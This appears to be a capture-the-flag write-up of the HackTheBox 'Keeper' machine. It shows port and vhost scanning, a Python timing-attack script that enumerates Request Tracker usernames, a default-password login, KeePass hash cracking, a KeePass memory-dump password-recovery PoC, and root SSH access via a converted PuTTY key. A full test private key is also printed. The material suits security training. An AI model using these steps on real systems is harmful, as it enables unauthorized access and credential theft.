Keeper#
Enum#
nmap -Pn -sC -sV 10.10.11.227 -oN scans/nmap.initial
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-14 19:51 IST
Nmap scan report for 10.10.11.227
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.13 seconds
nmap -Pn -p- 10.10.11.227 -oN scans/nmap.allports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-14 20:28 IST
Nmap scan report for tickets.keeper.htb (10.10.11.227)
Host is up (0.037s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 29.96 seconds
curl -i http://10.10.11.227
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 14 Aug 2023 18:51:59 GMT
Content-Type: text/html
Content-Length: 149
Last-Modified: Wed, 24 May 2023 14:04:44 GMT
Connection: keep-alive
ETag: "646e197c-95"
Accept-Ranges: bytes
<html>
<body>
<a href="http://tickets.keeper.htb/rt/">To raise an IT support ticket, please visit tickets.keeper.htb/rt/</a>
</body>
</html>
curl -I http://tickets.keeper.htb
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: RT_SID_tickets.keeper.htb.80=e109010be5f40cc76fe51ad8cd372f60; path=/rt; HttpOnly
Date: Mon, 14 Aug 2023 18:54:37 GMT
Cache-control: no-cache
Pragma: no-cache
X-Frame-Options: DENY
ffuf \
-c \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
-u "http://keeper.htb" \
-H "Host: FUZZ.keeper.htb" -mc all -fs 149
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://keeper.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.keeper.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 149
________________________________________________
[Status: 200, Size: 4236, Words: 407, Lines: 154, Duration: 46ms]
* FUZZ: tickets
:: Progress: [19966/19966] :: Job [1/1] :: 1234 req/sec :: Duration: [0:00:17] :: Errors: 0 ::
So that’s running Best Practical
Request Tracker
version 4.4.4
CVE-2021-38562
Best Practical Request Tracker (RT) 4.2 before 4.2.17, 4.4 before 4.4.5, and 5.0 before 5.0.2 allows sensitive information disclosure via a timing attack against lib/RT/REST2/Middleware/Auth.pm.
https://docs.bestpractical.com/release-notes/rt/4.4.5
This one was fixed at 4.4.5, and most of the other one are already fixed in 4.4.4, or don’t seem super useful.
Side channel attack#
Searching for timing attack
on ippsec.rocks I found this video demonstrating how to do a time based side channel attacks in python. So I wrote this script, taking inspiration from that
import requests
def check_user(username):
url = "http://tickets.keeper.htb/rt/NoAuth/Login.html"
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "RT_SID_tickets.keeper.htb.80="
"33ea3d15db846fcd0ac8006b0eb5e7c7"
}
payload = f"user={username}&pass=asdf"
res = requests.post(url, headers=headers, data=payload)
return res.elapsed.microseconds
if __name__ == "__main__":
with open(
"/usr/share/seclists/Usernames/"
"cirt-default-usernames.txt",
#"top-usernames-shortlist.txt",
"r"
) as f:
usernames = f.read()
usernames = usernames.split("\n")
for user in usernames:
user = user.lower()
time = check_user(user)
if time > 400000:
print(f"{time} - \x1b[32m{user}\x1b[0m")
python3 side-channel.py
516635 - root
522913 - root
406899 - root
Now that I know the root is a valid user, I just tried a few passwords, and just password
worked
And a few seconds of poking around the portal later, we find the lnorgaard unix username and passwor
Privesc with a KeePass CVE#
lnorgaard@keeper:~$ sudo -l
[sudo] password for lnorgaard:
Sorry, user lnorgaard may not run sudo on keeper.
grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
lnorgaard:x:1000:1000:lnorgaard,,,:/home/lnorgaard:/bin/bash
lnorgaard@keeper:~$ id
uid=1000(lnorgaard) gid=1000(lnorgaard) groups=1000(lnorgaard)
lnorgaard@keeper:~$ ls -la
total 85384
drwxr-xr-x 4 lnorgaard lnorgaard 4096 Aug 15 01:00 .
drwxr-xr-x 3 root root 4096 May 24 16:09 ..
lrwxrwxrwx 1 root root 9 May 24 15:55 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard 220 May 23 14:43 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard 3771 May 23 14:43 .bashrc
drwx------ 2 lnorgaard lnorgaard 4096 May 24 16:09 .cache
-rw------- 1 lnorgaard lnorgaard 20 Aug 15 00:12 .lesshst
-rw------- 1 lnorgaard lnorgaard 807 May 23 14:43 .profile
-rw-r--r-- 1 root root 87391651 Aug 15 01:00 RT30000.zip
drwx------ 2 lnorgaard lnorgaard 4096 Jul 24 10:25 .ssh
-rw-r----- 1 root lnorgaard 33 Aug 14 23:43 user.txt
-rw-r--r-- 1 root root 39 Jul 20 19:03 .vimrc
I’m scp-ing that zip over to my machine, once extracted theres a kdbx
, which is a keepass database.
ls -la
total 247480
drwxr-xr-x 3 blnkn blnkn 4096 Aug 15 00:01 .
drwxr-xr-x 6 blnkn blnkn 4096 Aug 15 00:01 ..
-rwxr-x--- 1 blnkn blnkn 253395188 Aug 14 22:41 KeePassDumpFull.dmp
-rwxr-x--- 1 blnkn blnkn 3630 Aug 14 22:40 passcodes.kdbx
drwxr-xr-x 2 blnkn blnkn 4096 Aug 14 22:44 zip
Trying to crack that in the background, but didn’t get any luck
keepass2john passcodes.kdbx > hash.txt
hashcat -m 13400 hash.txt /usr/share/wordlists/rockyou.txt
Looking through the dmp file with strings, there are a lot of windows reference, and googling around a little, there’s a CVE where it’s possible to extract a keepass password from a memory dump.
Tried the original PoC in dotnet, but the password didn’t seem to make any sense to me, so I tried another implementation of the tool in python, and yea, same result, so I’m googling around some more about those words, and it quickly started to make sense, this is so Danish food stuff… haha.
python3 poc.py ~/sec/htb/machines/keeper/loot/zip/KeePassDumpFull.dmp
2023-08-14 23:21:32,532 [.] [main] Opened /home/blnkn/sec/htb/machines/keeper/loot/zip/KeePassDumpFull.dmp
Possible password: ●,d**************
Possible password: ●ld**************
Possible password: ●`d**************
Possible password: ●-d**************
Possible password: ●'d**************
Possible password: ●]d**************
Possible password: ●Ad**************
Possible password: ●Id**************
Possible password: ●:d**************
Possible password: ●=d**************
Possible password: ●_d**************
Possible password: ●cd**************
Possible password: ●Md**************
sudo apt-get install kpcli
kpcli --kdb=passcodes.kdbx
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/>
Exploring the db we find a Putty key pretty quickly
kpcli:/passcodes/Network> show -f 0
Path: /passcodes/Network/
Title: keeper.htb (Ticketing Server)
Uname: root
Pass: F4********
URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AA**************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************
Private-Lines: 14
AA**************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
****************************************************************
************************************************
Private-MAC: b0a0************************************************************
Looking through stack overflow to find out that this is a ppk
which is the ssh key format of Putty, so we presumably just have to transform that into an openssh pem and we’re good to go.
Found this tool called puttygen
which can be install as part of putty-tools
sudo apt-get install putty-tools
Tried to go from pem to ppk first with some test key that I generated
ssh-keygen -f test
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in test
Your public key has been saved in test.pub
The key fingerprint is:
SHA256:3L8/04t6lC0AXf7f92Jre2iFL0xUksdPrmzuVcHb93k blnkn@Kolossus
The key's randomart image is:
+---[RSA 3072]----+
| . .. o |
| . .. + =|
| . . O.|
| . . . o *|
| S . .oo=+|
| . +*.O|
| o=.*E|
| o&.B|
| .+B=Xo|
+----[SHA256]-----+
puttygen test -o test.ppk
And yea it looks exactly like what we got
cat test.ppk
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: blnkn@Kolossus
Public-Lines: 9
AAAAB3NzaC1yc2EAAAADAQABAAABgQCl9+8kaKs4/kioPaFTU78I2Qsw9xHWylYb
Hzo7RmUB+6eCZRUuzkoGfgt+Rc9DBeN57HJR4RpzarMe6pTRqD+QiUvnL4boyPQu
wqLLhnjg8swaG8vw5DftiC0qL34WzkfFYoplvbr5crbUIbnWh9oL+F8elSyFDNEi
CZXQ5DfHoXoH2VOsZ0P+cxZ3Apgjeszhe3OQtndTSBtfxFGgP2indJOlVLfK7Ru3
uraQgeIBWAf+OJ30qq8X9RiAYQ5uDYRNXHRc76fC3ewOTUaeQp2Q2RKFlcVBFGPj
X/KW+sGqLFEulHy+PgMvOsjJQlQDotX3YercuE8xuYxpvZBy6MN0qVDKGgiwrD0w
HluAAjgSXizIglY6XuuhSkUN+sF0Ifp+dJrT/0kZmoUZEH0pYpzYUBwdylm28a1Z
B4P9dIlFSUAkyMwG8vb8DGIswb9Ek8Vi178Zrevf5tkCd0wjIHYEzOoQBCFlnffD
+zNOtl8PynShryvTEW96GJOWPCDF6YE=
Private-Lines: 21
AAABgAqDb68vQDVuijy6FreYFQBi+14BMKyaCaVTL5Wkqm5bOiu86oAaCj9qCaFY
m74Dp/rHuyArscjA6BLbykyTq18lC11cOeASJsG1i6l33b1mM/6tZxhd5JsT5sSG
2KZqL8q1qM20HJ2DokhC0Kph1bKva5sc2QKeorrUv5xJcK0hMgFAR5givIBoWvJ0
BB4vP75C2zm+DUYFydIhtggALEl7TYUKHlBo/7n+RmVWDPKH2I3GmV7v1wKeAIzV
WRwol/AifPTb+2PoVJsHwLLm+mJg4dxDrnGUy3KQLITsOZQT4S8qlGuh112IeHlz
CIAnaJ1hTVd8tbm6selt494EYDfiOVDwJlK/gbBqiz/cL6nid1L7XM83h85w75FL
RzGkX+U3Z4sRwJVPYe8ZXlHLb4OTvnpoVrfv5KaZAnuzY06w8ObECbQm54+5AR4C
k0bbji1no+MUoeMBesYkFfceSHYqXqXCNS6Ve7zjZ7arVAEOn2BNPjmyVz1IZoXH
dtG1XwAAAMEA52KbhNzEteRYrCLP/MH35BXXCrQXrP4RfTyx/J+gc+vyAW11kEjr
n3Ac37bfjIE0GbCZU7rt7+GGNJZdVCVYveSZCbfo/CcWW8hczzNnlymqZsLsixca
pxZViS3TXS5fBfeW1uSC0LTnU6fuTffa2VOiQvGhxRI6MssILSBCiODIfGonVHMu
eyTT1SlqX7KxzDWKQ24PZM00ZXH6ps29mJ3uRvOf+51+pzCEHoG9EgcWIkQj6aK0
zAoayHdiZm/fAAAAwQC3n8+yPxW+5OLwbzxo+eSFEKsNhF3sMOXBRTGNBXpMZD6N
lFKssUrIId1XXmGdhem31fbe2rYceub3iB4w2MzGdzF3lyuFLBywvbwxAyKdLJp3
CpBX6W/7HOdFui9OA4Oxgm0RCOnMtPKvKOT+BqBjXC0C+HfL+SCseEsOGBdfbv+F
x5kfm5SqrZnvJ4eWHPs7wF+Go7Kx1esOvRpIil4eQAOzjXD+S2/usFEFp5CMG5WR
mgxi4GleIXn+wwLPUp8AAADAdZvHx+LFZ7wHC0PcBdCqoX4NnvZ+qogcdGPg4NKR
bCWfI0b0I+cdp4rFVeV8ZshsCnhQLYRSkxubEmmFtKDcL2MvDHN4+IKqqtFseIEB
8U0rE1c85K8lquU+h/rWT4tp8uKN04YpEUVLxjv1k3vUMmeGVSGAu+Juwj2Is643
PaxlmxRaFCiCBwL1fpvL2z5z44K7vzmjUE1+F/GjqCG2pro+xlcoEuQbq5XLDppc
BGpj6b/cE/hMZQWSFg+m1bSO
Private-MAC: 72ae0c890cd9bbef6995546741ee2f2cf2bba0536a55fc09aaf40c63e4de3041
Translating the real one from ppk to pem
puttygen priv.ppk -O private-openssh -o priv.pem
Noice
ssh -i priv.pem root@keeper.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
You have new mail.
Last login: Tue Aug 15 01:12:12 2023 from 10.10.14.118
root@keeper:~#
root@keeper:~#
root@keeper:~#
root@keeper:~#
root@keeper:~#
root@keeper:~#
root@keeper:~#
root@keeper:~#